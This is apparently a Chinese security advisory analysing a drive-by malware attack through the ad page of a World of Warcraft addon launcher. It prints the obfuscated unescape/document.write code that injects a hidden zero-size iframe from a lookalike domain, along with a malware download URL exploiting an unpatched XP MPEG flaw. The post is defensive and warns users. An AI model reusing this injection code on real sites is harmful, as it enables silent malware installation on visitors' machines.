由于大脚插件登录界面内含有广告页面,黑客利用这一点实施挂马行为。
分析:
大脚打开的页面 默认打开广告页面的连接: http://wow.178.com/s/zt/dajiao2.html
代码里的内容吧 [ http://market.178.com/C/33876467888.js ]
挂马地址 hxxp://market.178.com/C/count.html 这里嵌套了一个flash跳转到地址
var NewWords; NewWords = unescape("%3Ciframe%20width%3D%270%0A%27%20height%3D%270%27%20%0Asrc%3D%27http%3A//pic.0fcard.com/ddtx/do/173984021.htm%27%3E%3C/iframe%3E");document.write(NewWords);
这里的0fcard.com 不是殴飞点卡网站 是o 而不是0(零) 专门来混淆玩家的 。
下载执行 hxxp://pic.0fcard.com/ddtx/do/gewsfe.exe
如果你的xp没有打过mpeg漏洞补丁将会自动下载。
Virustotal可疑文件分析服务表明这病毒NOD以及瑞星暂时还未能查出。
此次事件,由于大脚178网站采用双线建站,出现问题的是 网通用户 http://market.178.com指向123.134.67.166,电信用户不受影响。
在此建议大家如还想继续使用大脚插件,应该加倍注意,尽量不要用大脚来登录游戏,也不要追新通常不是大版本更新魔兽世界插件是不用每天更新,同时经常更新你的杀毒软件更新你系统漏洞是必须的。详细参阅我之前的文章, [如何安全使用魔兽世界大脚插件]